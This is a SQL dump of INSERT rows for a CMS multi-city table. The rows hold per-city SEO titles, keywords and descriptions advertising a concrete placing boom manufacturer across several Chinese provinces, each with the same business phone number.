INSERT INTO `ey_weapp_multicity` VALUES ('254', '247', '247', '晋中市', '2', '1', '0', 'jinzhong', '晋中液压布料机厂家', '晋中布料机价格,晋中液压布料机,晋中液压布料机厂家', '晋中布料机专业生产厂家联系电话:17858811257', '100', '1655345379', '1655345379');
INSERT INTO `ey_weapp_multicity` VALUES ('255', '247', '247', '忻州市', '2', '1', '0', 'xinzhou', '忻州液压布料机厂家', '忻州布料机价格,忻州液压布料机,忻州液压布料机厂家', '忻州布料机专业生产厂家联系电话:17858811257', '100', '1655345655', '1655345655');
INSERT INTO `ey_weapp_multicity` VALUES ('256', '247', '247', '运城市', '2', '1', '0', 'yuncheng', '运城混凝土布料机厂家', '运城混凝土布料机价格,运城混凝土布料机,运城混凝土布料机厂家', '运城混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655345755', '1655345755');
INSERT INTO `ey_weapp_multicity` VALUES ('257', '247', '247', '阳泉市', '2', '1', '0', 'yangquan', '阳泉液压布料机厂家', '阳泉布料机价格,阳泉液压布料机,阳泉液压布料机厂家', '阳泉布料机专业生产厂家联系电话:17858811257', '100', '1655345853', '1655345853');
INSERT INTO `ey_weapp_multicity` VALUES ('258', '247', '247', '晋城市', '2', '1', '0', 'jincheng', '晋城混凝土布料机厂家', '晋城混凝土布料机价格,晋城混凝土布料机,晋城混凝土布料机厂家', '晋城混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655346149', '1655346149');
INSERT INTO `ey_weapp_multicity` VALUES ('259', '247', '247', '阳泉市', '2', '1', '0', 'yqs', '阳泉液压布料机厂家', '阳泉布料机价格,阳泉液压布料机,阳泉液压布料机厂家', '阳泉布料机专业生产厂家联系电话:17858811257', '100', '1655346233', '1655346233');
INSERT INTO `ey_weapp_multicity` VALUES ('260', '0', '0', '辽宁省', '1', '1', '0', 'lns', '辽宁省混凝土布料机厂家', '辽宁省混凝土布料机价格,辽宁省混凝土布料机,辽宁省混凝土布料机厂家', '辽宁省混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655346466', '1655346466');
INSERT INTO `ey_weapp_multicity` VALUES ('261', '260', '260', '沈阳市', '2', '1', '0', 'shengyangshi', '沈阳市混凝土布料机厂家', '沈阳混凝土布料机价格,沈阳混凝土布料机,沈阳混凝土布料机厂家', '沈阳混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655346602', '1655346602');
INSERT INTO `ey_weapp_multicity` VALUES ('262', '260', '260', '大连市', '2', '1', '0', 'dls', '大连液压布料机厂家', '大连布料机价格,大连液压布料机,大连液压布料机厂家', '大连布料机专业生产厂家联系电话:17858811257', '100', '1655346721', '1655346721');
INSERT INTO `ey_weapp_multicity` VALUES ('263', '260', '260', '鞍山市', '2', '1', '0', 'ass', '鞍山混凝土布料机厂家', '鞍山混凝土布料机价格,鞍山混凝土布料机,鞍山混凝土布料机厂家', '鞍山混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655346840', '1655346840');
INSERT INTO `ey_weapp_multicity` VALUES ('264', '260', '260', '抚顺市', '2', '1', '0', 'wss', '抚顺市液压布料机厂家', '抚顺布料机价格,抚顺液压布料机,抚顺液压布料机厂家', '抚顺布料机专业生产厂家联系电话:17858811257', '100', '1655346913', '1655346913');
INSERT INTO `ey_weapp_multicity` VALUES ('265', '260', '260', '本溪市', '2', '1', '0', 'bx', '本溪市混凝土布料机厂家', '本溪混凝土布料机价格,本溪混凝土布料机,本溪混凝土布料机厂家', '本溪混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655346996', '1655346996');
INSERT INTO `ey_weapp_multicity` VALUES ('266', '260', '260', '丹东市', '2', '1', '0', 'dds', '丹东市液压布料机厂家', '丹东布料机价格,丹东液压布料机,丹东液压布料机厂家', '丹东布料机专业生产厂家联系电话:17858811257', '100', '1655347071', '1655347071');
INSERT INTO `ey_weapp_multicity` VALUES ('267', '260', '260', '锦州市', '2', '1', '0', 'jinzhou', '锦州混凝土布料机厂家', '锦州混凝土布料机价格,锦州混凝土布料机,锦州混凝土布料机厂家', '锦州混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655347177', '1655347177');
INSERT INTO `ey_weapp_multicity` VALUES ('268', '260', '260', '营口市', '2', '1', '0', 'yks', '营口市液压布料机厂家', '营口布料机价格,营口液压布料机,营口液压布料机厂家', '营口布料机专业生产厂家联系电话:17858811257', '100', '1655347447', '1655347447');
INSERT INTO `ey_weapp_multicity` VALUES ('269', '260', '260', '阜新市', '2', '1', '0', 'fxs', '阜新液压布料机厂家', '阜新布料机价格,阜新液压布料机,阜新液压布料机厂家', '阜新布料机专业生产厂家联系电话:17858811257', '100', '1655347518', '1655347518');
INSERT INTO `ey_weapp_multicity` VALUES ('270', '260', '260', '辽阳市', '2', '1', '0', 'liaoyang', '辽阳混凝土布料机厂家', '辽阳混凝土布料机价格,辽阳混凝土布料机,辽阳混凝土布料机厂家', '辽阳混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655347623', '1655347623');
INSERT INTO `ey_weapp_multicity` VALUES ('271', '260', '260', '盘锦市', '2', '1', '0', 'pjs', '盘锦液压布料机厂家', '盘锦布料机价格,盘锦液压布料机,盘锦液压布料机厂家', '盘锦布料机专业生产厂家联系电话:17858811257', '100', '1655347677', '1655347677');
INSERT INTO `ey_weapp_multicity` VALUES ('272', '260', '260', '铁岭市', '2', '1', '0', 'tl', '铁岭液压布料机厂家', '铁岭布料机价格,铁岭液压布料机,铁岭液压布料机厂家', '铁岭布料机专业生产厂家联系电话:17858811257', '100', '1655347753', '1655347753');
INSERT INTO `ey_weapp_multicity` VALUES ('273', '260', '260', '朝阳市', '2', '1', '0', 'zhaoyang', '朝阳混凝土布料机厂家', '朝阳混凝土布料机价格,朝阳混凝土布料机,朝阳混凝土布料机厂家', '朝阳混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655347829', '1655347829');
INSERT INTO `ey_weapp_multicity` VALUES ('274', '260', '260', '葫芦岛市', '2', '1', '0', 'hld', '葫芦岛液压布料机厂家', '葫芦岛布料机价格,葫芦岛液压布料机,葫芦岛液压布料机厂家', '葫芦岛布料机专业生产厂家联系电话:17858811257', '100', '1655347897', '1655347897');
INSERT INTO `ey_weapp_multicity` VALUES ('275', '0', '0', '台湾省', '1', '1', '0', 'tianwansheng', '台湾省混凝土布料机厂家', '台湾混凝土布料机价格,台湾混凝土布料机,台湾混凝土布料机厂家', '台湾混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655349018', '1655357173');
INSERT INTO `ey_weapp_multicity` VALUES ('276', '275', '275', '台北市', '2', '1', '0', 'tbs', '台北市混凝土布料机厂家', '台北混凝土布料机价格,台北混凝土布料机,台北混凝土布料机厂家', '台北混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655349307', '1655349307');
INSERT INTO `ey_weapp_multicity` VALUES ('277', '275', '275', '新北市', '2', '1', '0', 'xbs', '新北液压布料机厂家', '新北布料机价格,新北液压布料机,新北液压布料机厂家', '新北布料机专业生产厂家联系电话:17858811257', '100', '1655349738', '1655349738');
INSERT INTO `ey_weapp_multicity` VALUES ('278', '275', '275', '桃园市', '2', '1', '0', 'ty', '桃园混凝土布料机厂家', '桃园混凝土布料机价格,桃园混凝土布料机,桃园混凝土布料机厂家', '桃园混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655349821', '1655349821');
INSERT INTO `ey_weapp_multicity` VALUES ('279', '275', '275', '台中市', '2', '1', '0', 'taizhong', '台中液压布料机厂家', '台中布料机价格,台中液压布料机,台中液压布料机厂家', '台中布料机专业生产厂家联系电话:17858811257', '100', '1655349896', '1655349896');
INSERT INTO `ey_weapp_multicity` VALUES ('280', '275', '275', '台南市', '2', '1', '0', 'tns', '台南混凝土布料机厂家', '台南混凝土布料机价格,台南混凝土布料机,台南混凝土布料机厂家', '台南混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655356543', '1655356543');
INSERT INTO `ey_weapp_multicity` VALUES ('281', '275', '275', '高雄市', '2', '1', '0', 'gxs', '高雄液压布料机厂家', '高雄布料机价格,高雄液压布料机,高雄液压布料机厂家', '高雄布料机专业生产厂家联系电话:17858811257', '100', '1655356621', '1655356621');
INSERT INTO `ey_weapp_multicity` VALUES ('282', '275', '275', '基隆市', '2', '1', '0', 'jls', '基隆液压布料机厂家', '基隆布料机价格,基隆液压布料机,基隆液压布料机厂家', '基隆布料机专业生产厂家联系电话:17858811257', '100', '1655356694', '1655356694');
INSERT INTO `ey_weapp_multicity` VALUES ('283', '275', '275', '新竹市', '2', '1', '0', 'xzs', '新竹液压布料机厂家', '新竹布料机价格,新竹液压布料机,新竹液压布料机厂家', '新竹布料机专业生产厂家联系电话:17858811257', '100', '1655356884', '1655356884');
INSERT INTO `ey_weapp_multicity` VALUES ('284', '275', '275', '嘉义市', '2', '1', '0', 'jiayi', '嘉义混凝土布料机厂家', '嘉义混凝土布料机价格,嘉义混凝土布料机,嘉义混凝土布料机厂家', '嘉义混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655356954', '1655356954');
INSERT INTO `ey_weapp_multicity` VALUES ('285', '0', '0', '陕西省', '1', '1', '0', 'shanxisheng', '陕西省混凝土布料机厂家', '陕西混凝土布料机价格,陕西混凝土布料机,陕西混凝土布料机厂家', '陕西混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655357159', '1655357159');
INSERT INTO `ey_weapp_multicity` VALUES ('286', '285', '285', '西安市', '2', '1', '0', 'xian', '西安混凝土布料机厂家', '西安混凝土布料机价格,西安混凝土布料机,西安混凝土布料机厂家', '西安混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655357370', '1655357370');
INSERT INTO `ey_weapp_multicity` VALUES ('287', '285', '285', '咸阳市', '2', '1', '0', 'xianyang', '咸阳液压布料机厂家', '咸阳布料机价格,咸阳液压布料机,咸阳液压布料机厂家', '咸阳布料机专业生产厂家联系电话:17858811257', '100', '1655357469', '1655357469');
INSERT INTO `ey_weapp_multicity` VALUES ('288', '285', '285', '宝鸡市', '2', '1', '0', 'baoji', '宝鸡混凝土布料机厂家', '宝鸡混凝土布料机价格,宝鸡混凝土布料机,宝鸡混凝土布料机厂家', '宝鸡混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655357605', '1655357605');
INSERT INTO `ey_weapp_multicity` VALUES ('289', '285', '285', '铜川市', '2', '1', '0', 'tongchuan', '铜川液压布料机厂家', '铜川布料机价格,铜川液压布料机,铜川液压布料机厂家', '铜川布料机专业生产厂家联系电话:17858811257', '100', '1655357712', '1655357712');
INSERT INTO `ey_weapp_multicity` VALUES ('290', '285', '285', '渭南市', '2', '1', '0', 'weinan', '渭南液压布料机厂家', '渭南布料机价格,渭南液压布料机,渭南液压布料机厂家', '渭南布料机专业生产厂家联系电话:17858811257', '100', '1655357824', '1655357824');
INSERT INTO `ey_weapp_multicity` VALUES ('291', '285', '285', '延安市', '2', '1', '0', 'yanan', '延安液压布料机厂家', '延安布料机价格,延安液压布料机,延安液压布料机厂家', '延安布料机专业生产厂家联系电话:17858811257', '100', '1655357909', '1655357909');
INSERT INTO `ey_weapp_multicity` VALUES ('292', '285', '285', '榆林市', '2', '1', '0', 'yl', '榆林液压布料机厂家', '榆林布料机价格,榆林液压布料机,榆林液压布料机厂家', '榆林布料机专业生产厂家联系电话:17858811257', '100', '1655358079', '1655358120');
INSERT INTO `ey_weapp_multicity` VALUES ('293', '285', '285', '汉中市', '2', '1', '0', 'hanzhong', '汉中液压布料机厂家', '汉中布料机价格,汉中液压布料机,汉中液压布料机厂家', '汉中布料机专业生产厂家联系电话:17858811257', '100', '1655358197', '1655358197');
INSERT INTO `ey_weapp_multicity` VALUES ('294', '285', '285', '安康市', '2', '1', '0', 'ankang', '安康混凝土布料机厂家', '安康混凝土布料机价格,安康混凝土布料机,安康混凝土布料机厂家', '安康混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655358260', '1655358260');
INSERT INTO `ey_weapp_multicity` VALUES ('295', '285', '285', '商洛市', '2', '1', '0', 'shangluo', '商洛混凝土布料机厂家', '商洛混凝土布料机价格,商洛混凝土布料机,商洛混凝土布料机厂家', '商洛混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655358363', '1655358363');
INSERT INTO `ey_weapp_multicity` VALUES ('296', '0', '0', '吉林省', '1', '1', '0', 'jilinsheng', '吉林混凝土布料机厂家', '吉林混凝土布料机价格,吉林混凝土布料机,吉林混凝土布料机厂家', '吉林混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655358470', '1655358470');
INSERT INTO `ey_weapp_multicity` VALUES ('297', '296', '296', '长春市', '2', '1', '0', 'ccs', '长春混凝土布料机厂家', '长春混凝土布料机价格,长春混凝土布料机,长春混凝土布料机厂家', '长春混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655358612', '1655358612');
INSERT INTO `ey_weapp_multicity` VALUES ('298', '296', '296', '吉林市', '2', '1', '0', 'jilin', '吉林液压布料机厂家', '吉林布料机价格,吉林液压布料机,吉林液压布料机厂家', '吉林布料机专业生产厂家联系电话:17858811257', '100', '1655358713', '1655358713');
INSERT INTO `ey_weapp_multicity` VALUES ('299', '296', '296', '四平市', '2', '1', '0', 'siping', '四平混凝土布料机厂家', '四平混凝土布料机价格,四平混凝土布料机,四平混凝土布料机厂家', '四平混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655358820', '1655358820');
INSERT INTO `ey_weapp_multicity` VALUES ('300', '296', '296', '辽源市', '2', '1', '0', 'liaoyuan', '辽源液压布料机厂家', '辽源布料机价格,辽源液压布料机,辽源液压布料机厂家', '辽源布料机专业生产厂家联系电话:17858811257', '100', '1655359567', '1655359567');
INSERT INTO `ey_weapp_multicity` VALUES ('301', '296', '296', '通化市', '2', '1', '0', 'tonghua', '通化混凝土布料机厂家', '通化混凝土布料机价格,通化混凝土布料机,通化混凝土布料机厂家', '通化混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655359640', '1655359640');
INSERT INTO `ey_weapp_multicity` VALUES ('302', '296', '296', '白山市', '2', '1', '0', 'baishan', '白山市液压布料机厂家', '白山布料机价格,白山液压布料机,白山液压布料机厂家', '白山布料机专业生产厂家联系电话:17858811257', '100', '1655359708', '1655359708');
INSERT INTO `ey_weapp_multicity` VALUES ('303', '296', '296', '松原市', '2', '1', '0', 'songyuan', '松原液压布料机厂家', '松原布料机价格,松原液压布料机,松原液压布料机厂家', '松原布料机专业生产厂家联系电话:17858811257', '100', '1655359811', '1655359811');
INSERT INTO `ey_weapp_multicity` VALUES ('304', '296', '296', '白城市', '2', '1', '0', 'baicheng', '白城液压布料机厂家', '白城布料机价格,白城液压布料机,白城液压布料机厂家', '白城布料机专业生产厂家联系电话:17858811257', '100', '1655359880', '1655359880');
INSERT INTO `ey_weapp_multicity` VALUES ('305', '0', '0', '黑龙江省', '1', '1', '0', 'hljs', '黑龙江混凝土布料机厂家', '黑龙江混凝土布料机价格,黑龙江混凝土布料机,黑龙江混凝土布料机厂家', '黑龙江混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655360653', '1655360653');
INSERT INTO `ey_weapp_multicity` VALUES ('306', '305', '305', '哈尔滨市', '2', '1', '0', 'hebs', '哈尔滨液压布料机厂家', '哈尔滨布料机价格,哈尔滨液压布料机,哈尔滨液压布料机厂家', '哈尔滨布料机专业生产厂家联系电话:17858811257', '100', '1655360862', '1655360862');
INSERT INTO `ey_weapp_multicity` VALUES ('307', '305', '305', '齐齐哈尔市', '2', '1', '0', 'qqhe', '齐齐哈尔混凝土布料机厂家', '齐齐哈尔混凝土布料机价格,齐齐哈尔混凝土布料机,齐齐哈尔混凝土布料机厂家', '齐齐哈尔混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655360944', '1655360944');
INSERT INTO `ey_weapp_multicity` VALUES ('308', '305', '305', '牡丹江市', '2', '1', '0', 'mdjs', '牡丹江液压布料机厂家', '牡丹江布料机价格,牡丹江液压布料机,牡丹江液压布料机厂家', '牡丹江布料机专业生产厂家联系电话:17858811257', '100', '1655361058', '1655361058');
INSERT INTO `ey_weapp_multicity` VALUES ('309', '305', '305', '佳木斯市', '2', '1', '0', 'jmss', '佳木斯液压布料机厂家', '佳木斯布料机价格,佳木斯液压布料机,佳木斯液压布料机厂家', '佳木斯布料机专业生产厂家联系电话:17858811257', '100', '1655361375', '1655361375');
INSERT INTO `ey_weapp_multicity` VALUES ('310', '305', '305', '大庆市', '2', '1', '0', 'dqs', '大庆液压布料机厂家', '大庆布料机价格,大庆液压布料机,大庆液压布料机厂家', '大庆布料机专业生产厂家联系电话:17858811257', '100', '1655362509', '1655365064');
INSERT INTO `ey_weapp_multicity` VALUES ('311', '305', '305', '鸡西市', '2', '1', '0', 'jixishi', '鸡西混凝土布料机厂家', '鸡西混凝土布料机价格,鸡西混凝土布料机,鸡西混凝土布料机厂家', '鸡西混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655362620', '1655362928');
INSERT INTO `ey_weapp_multicity` VALUES ('312', '305', '305', '双鸭山市', '2', '1', '0', 'syss', '双鸭山液压布料机厂家', '双鸭山布料机价格,双鸭山液压布料机,双鸭山液压布料机厂家', '双鸭山布料机专业生产厂家联系电话:17858811257', '100', '1655363051', '1655363051');
INSERT INTO `ey_weapp_multicity` VALUES ('313', '305', '305', '伊春市', '2', '1', '0', 'yichunshi', '伊春混凝土布料机厂家', '伊春混凝土布料机价格,伊春混凝土布料机,伊春混凝土布料机厂家', '伊春混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655363217', '1655363217');
INSERT INTO `ey_weapp_multicity` VALUES ('314', '305', '305', '七台河市', '2', '1', '0', 'qitaihe', '七台河液压布料机厂家', '七台河布料机价格,七台河液压布料机,七台河液压布料机厂家', '七台河布料机专业生产厂家联系电话:17858811257', '100', '1655363492', '1655363492');
INSERT INTO `ey_weapp_multicity` VALUES ('315', '305', '305', '鹤岗市', '2', '1', '0', 'hegangshi', '鹤岗液压布料机厂家', '鹤岗布料机价格,鹤岗液压布料机,鹤岗液压布料机厂家', '鹤岗布料机专业生产厂家联系电话:17858811257', '100', '1655363835', '1655363835');
INSERT INTO `ey_weapp_multicity` VALUES ('316', '305', '305', '黑河市', '2', '1', '0', 'heiheshi', '黑河混凝土布料机厂家', '黑河混凝土布料机价格,黑河混凝土布料机,黑河混凝土布料机厂家', '黑河混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655363941', '1655363941');
INSERT INTO `ey_weapp_multicity` VALUES ('317', '305', '305', '绥化市', '2', '1', '0', 'sss', '绥化液压布料机厂家', '绥化布料机价格,绥化液压布料机,绥化液压布料机厂家', '绥化布料机专业生产厂家联系电话:17858811257', '100', '1655364017', '1655364334');
INSERT INTO `ey_weapp_multicity` VALUES ('318', '305', '305', '大兴安岭', '2', '1', '0', 'dxal', '大兴安岭液压布料机厂家', '大兴安岭布料机价格,大兴安岭液压布料机,大兴安岭液压布料机厂家', '大兴安岭布料机专业生产厂家联系电话:17858811257', '100', '1655364688', '1655364688');
INSERT INTO `ey_weapp_multicity` VALUES ('319', '0', '0', '海南省', '1', '1', '0', 'hainansheng', '海南省混凝土布料机厂家', '海南混凝土布料机价格,海南混凝土布料机,海南混凝土布料机厂家', '海南混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655364793', '1655364793');
INSERT INTO `ey_weapp_multicity` VALUES ('320', '319', '319', '海口市', '2', '1', '0', 'hks', '海口混凝土布料机厂家', '海口混凝土布料机价格,海口混凝土布料机,海口混凝土布料机厂家', '海口混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655365503', '1655365503');
INSERT INTO `ey_weapp_multicity` VALUES ('321', '319', '319', '三亚市', '2', '1', '0', 'sanyashi', '三亚液压布料机厂家', '三亚布料机价格,三亚液压布料机,三亚液压布料机厂家', '三亚布料机专业生产厂家联系电话:17858811257', '100', '1655365693', '1655365788');
INSERT INTO `ey_weapp_multicity` VALUES ('322', '319', '319', '三沙市', '2', '1', '0', 'shansha', '三沙市液压布料机厂家', '三沙布料机价格,三沙液压布料机,三沙液压布料机厂家', '三沙布料机专业生产厂家联系电话:17858811257', '100', '1655365908', '1655365908');
INSERT INTO `ey_weapp_multicity` VALUES ('323', '319', '319', '儋州市', '2', '1', '0', 'danzhoushi', '儋州混凝土布料机厂家', '儋州混凝土布料机价格,儋州混凝土布料机,儋州混凝土布料机厂家', '儋州混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655366019', '1655366019');
INSERT INTO `ey_weapp_multicity` VALUES ('324', '0', '0', '贵州省', '1', '1', '0', 'guizhou', '贵州混凝土布料机厂家', '贵州混凝土布料机价格,贵州混凝土布料机,贵州混凝土布料机厂家', '贵州混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655367341', '1655367341');
INSERT INTO `ey_weapp_multicity` VALUES ('325', '324', '324', '贵阳市', '2', '1', '0', 'gy', '贵阳混凝土布料机厂家', '贵阳混凝土布料机价格,贵阳混凝土布料机,贵阳混凝土布料机厂家', '贵阳混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655367878', '1655367878');
INSERT INTO `ey_weapp_multicity` VALUES ('326', '324', '324', '遵义市', '2', '1', '0', 'zys', '遵义液压布料机厂家', '遵义布料机价格,遵义液压布料机,遵义液压布料机厂家', '遵义布料机专业生产厂家联系电话:17858811257', '100', '1655367999', '1655368056');
INSERT INTO `ey_weapp_multicity` VALUES ('327', '324', '324', '六盘水市', '2', '1', '0', 'lpss', '六盘水液压布料机厂家', '六盘水布料机价格,六盘水液压布料机,六盘水液压布料机厂家', '六盘水布料机专业生产厂家联系电话:17858811257', '100', '1655368313', '1655368313');
INSERT INTO `ey_weapp_multicity` VALUES ('328', '324', '324', '安顺市', '2', '1', '0', 'as', '安顺混凝土布料机厂家', '安顺混凝土布料机价格,安顺混凝土布料机,安顺混凝土布料机厂家', '安顺混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655368393', '1655368393');
INSERT INTO `ey_weapp_multicity` VALUES ('329', '324', '324', '毕节市', '2', '1', '0', 'bijie', '毕节液压布料机厂家', '毕节布料机价格,毕节液压布料机,毕节液压布料机厂家', '毕节布料机专业生产厂家联系电话:17858811257', '100', '1655368562', '1655368562');
INSERT INTO `ey_weapp_multicity` VALUES ('330', '324', '324', '铜仁市', '2', '1', '0', 'tr', '铜仁混凝土布料机厂家', '铜仁混凝土布料机价格,铜仁混凝土布料机,铜仁混凝土布料机厂家', '铜仁混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655368766', '1655368766');
INSERT INTO `ey_weapp_multicity` VALUES ('331', '324', '324', '凯里市', '2', '1', '0', 'kls', '凯里混凝土布料机厂家', '凯里混凝土布料机价格,凯里混凝土布料机,凯里混凝土布料机厂家', '凯里混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655369653', '1655369653');
INSERT INTO `ey_weapp_multicity` VALUES ('332', '324', '324', '都匀市', '2', '1', '0', 'dunjun', '都匀液压布料机厂家', '都匀布料机价格,都匀液压布料机,都匀液压布料机厂家', '都匀布料机专业生产厂家联系电话:17858811257', '100', '1655369851', '1655369862');
INSERT INTO `ey_weapp_multicity` VALUES ('333', '324', '324', '兴义市', '2', '1', '0', 'xinyi', '兴义混凝土布料机厂家', '兴义混凝土布料机价格,兴义混凝土布料机,兴义混凝土布料机厂家', '兴义混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655369935', '1655369935');
INSERT INTO `ey_weapp_multicity` VALUES ('334', '0', '0', '云南省', '1', '1', '0', 'yunan', '云南混凝土布料机厂家', '云南混凝土布料机价格,云南混凝土布料机,云南混凝土布料机厂家', '云南混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655425416', '1655425416');
INSERT INTO `ey_weapp_multicity` VALUES ('335', '334', '334', '昆明市', '2', '1', '0', 'kms', '昆明液压布料机厂家', '昆明布料机价格,昆明液压布料机,昆明液压布料机厂家', '昆明布料机专业生产厂家联系电话:17858811257', '100', '1655425647', '1655425647');
INSERT INTO `ey_weapp_multicity` VALUES ('336', '334', '334', '曲靖市', '2', '1', '0', 'qjs', '曲靖液压布料机厂家', '曲靖布料机价格,曲靖液压布料机,曲靖液压布料机厂家', '曲靖布料机专业生产厂家联系电话:17858811257', '100', '1655425935', '1655425935');
INSERT INTO `ey_weapp_multicity` VALUES ('337', '334', '334', '玉溪市', '2', '1', '0', 'ys', '玉溪混凝土布料机厂家', '玉溪混凝土布料机价格,玉溪混凝土布料机,玉溪混凝土布料机厂家', '玉溪混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655426018', '1655426018');
INSERT INTO `ey_weapp_multicity` VALUES ('338', '334', '334', '丽江市', '2', '1', '0', 'lijiang', '丽江市液压布料机厂家', '丽江布料机价格,丽江液压布料机,丽江液压布料机厂家', '丽江布料机专业生产厂家联系电话:17858811257', '100', '1655426499', '1655426499');
INSERT INTO `ey_weapp_multicity` VALUES ('339', '334', '334', '普洱市', '2', '1', '0', 'puershi', '普洱混凝土布料机厂家', '普洱混凝土布料机价格,普洱混凝土布料机,普洱混凝土布料机厂家', '普洱混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655426610', '1655426610');
INSERT INTO `ey_weapp_multicity` VALUES ('340', '334', '334', '保山市', '2', '1', '0', 'baoshan', '保山液压布料机厂家', '保山布料机价格,保山液压布料机,保山液压布料机厂家', '保山布料机专业生产厂家联系电话:17858811257', '100', '1655426723', '1655426723');
INSERT INTO `ey_weapp_multicity` VALUES ('341', '334', '334', '昭通市', '2', '1', '0', 'zts', '昭通混凝土布料机厂家', '昭通混凝土布料机价格,昭通混凝土布料机,昭通混凝土布料机厂家', '昭通混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655426879', '1655426879');
INSERT INTO `ey_weapp_multicity` VALUES ('342', '334', '334', '临沧市', '2', '1', '0', 'lincang', '临沧液压布料机厂家', '临沧布料机价格,临沧液压布料机,临沧液压布料机厂家', '临沧布料机专业生产厂家联系电话:17858811257', '100', '1655427017', '1655427017');
INSERT INTO `ey_weapp_multicity` VALUES ('343', '0', '0', '甘肃省', '1', '1', '0', 'ganshusheng', '甘肃省液压布料机厂家', '甘肃布料机价格,甘肃液压布料机,甘肃液压布料机厂家', '甘肃布料机专业生产厂家联系电话:17858811257', '100', '1655427225', '1655427225');
INSERT INTO `ey_weapp_multicity` VALUES ('344', '343', '343', '兰州市', '2', '1', '0', 'lanzhou', '兰州混凝土布料机厂家', '兰州混凝土布料机价格,兰州混凝土布料机,兰州混凝土布料机厂家', '兰州混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655427682', '1655427682');
INSERT INTO `ey_weapp_multicity` VALUES ('345', '343', '343', '嘉峪关市', '2', '1', '0', 'jiayuguan', '嘉峪关市液压布料机厂家', '嘉峪关市布料机价格,嘉峪关市液压布料机,嘉峪关市液压布料机厂家', '嘉峪关市布料机专业生产厂家联系电话:17858811257', '100', '1655427831', '1655427831');
INSERT INTO `ey_weapp_multicity` VALUES ('346', '343', '343', '金昌市', '2', '1', '0', 'jcs', '金昌液压布料机厂家', '金昌布料机价格,金昌液压布料机,金昌液压布料机厂家', '金昌布料机专业生产厂家联系电话:17858811257', '100', '1655428010', '1655428010');
INSERT INTO `ey_weapp_multicity` VALUES ('347', '343', '343', '白银市', '2', '1', '0', 'baiyin', '白银液压布料机厂家', '白银布料机价格,白银液压布料机,白银液压布料机厂家', '白银布料机专业生产厂家联系电话:17858811257', '100', '1655428094', '1655428094');
INSERT INTO `ey_weapp_multicity` VALUES ('348', '343', '343', '天水市', '2', '1', '0', 'tianshui', '天水混凝土布料机厂家', '天水混凝土布料机价格,天水混凝土布料机,天水混凝土布料机厂家', '天水混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655428339', '1655428339');
INSERT INTO `ey_weapp_multicity` VALUES ('349', '343', '343', '武威市', '2', '1', '0', 'wuwei', '武威混凝土布料机厂家', '武威混凝土布料机价格,武威混凝土布料机,武威混凝土布料机厂家', '武威混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655428429', '1655428429');
INSERT INTO `ey_weapp_multicity` VALUES ('350', '343', '343', '张掖市', '2', '1', '0', 'zhangye', '张掖液压布料机厂家', '张掖布料机价格,张掖液压布料机,张掖液压布料机厂家', '张掖布料机专业生产厂家联系电话:17858811257', '100', '1655428511', '1655428511');
INSERT INTO `ey_weapp_multicity` VALUES ('351', '343', '343', '平凉市', '2', '1', '0', 'pls', '平凉液压布料机厂家', '平凉布料机价格,平凉液压布料机,平凉液压布料机厂家', '平凉布料机专业生产厂家联系电话:17858811257', '100', '1655428610', '1655428610');
INSERT INTO `ey_weapp_multicity` VALUES ('352', '343', '343', '酒泉市', '2', '1', '0', 'jiuquan', '酒泉液压布料机厂家', '酒泉布料机价格,酒泉液压布料机,酒泉液压布料机厂家', '酒泉布料机专业生产厂家联系电话:17858811257', '100', '1655429398', '1655429398');
INSERT INTO `ey_weapp_multicity` VALUES ('353', '343', '343', '庆阳市', '2', '1', '0', 'qingyang', '庆阳混凝土布料机厂家', '庆阳混凝土布料机价格,庆阳混凝土布料机,庆阳混凝土布料机厂家', '庆阳混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655429487', '1655429487');
INSERT INTO `ey_weapp_multicity` VALUES ('354', '343', '343', '定西市', '2', '1', '0', 'dingxi', '定西混凝土布料机厂家', '定西混凝土布料机价格,定西混凝土布料机,定西混凝土布料机厂家', '定西混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655429599', '1655429599');
INSERT INTO `ey_weapp_multicity` VALUES ('355', '343', '343', '陇南市', '2', '1', '0', 'longnan', '陇南市液压布料机厂家', '陇南市布料机价格,陇南市液压布料机,陇南市液压布料机厂家', '陇南市布料机专业生产厂家联系电话:17858811257', '100', '1655429748', '1655429748');
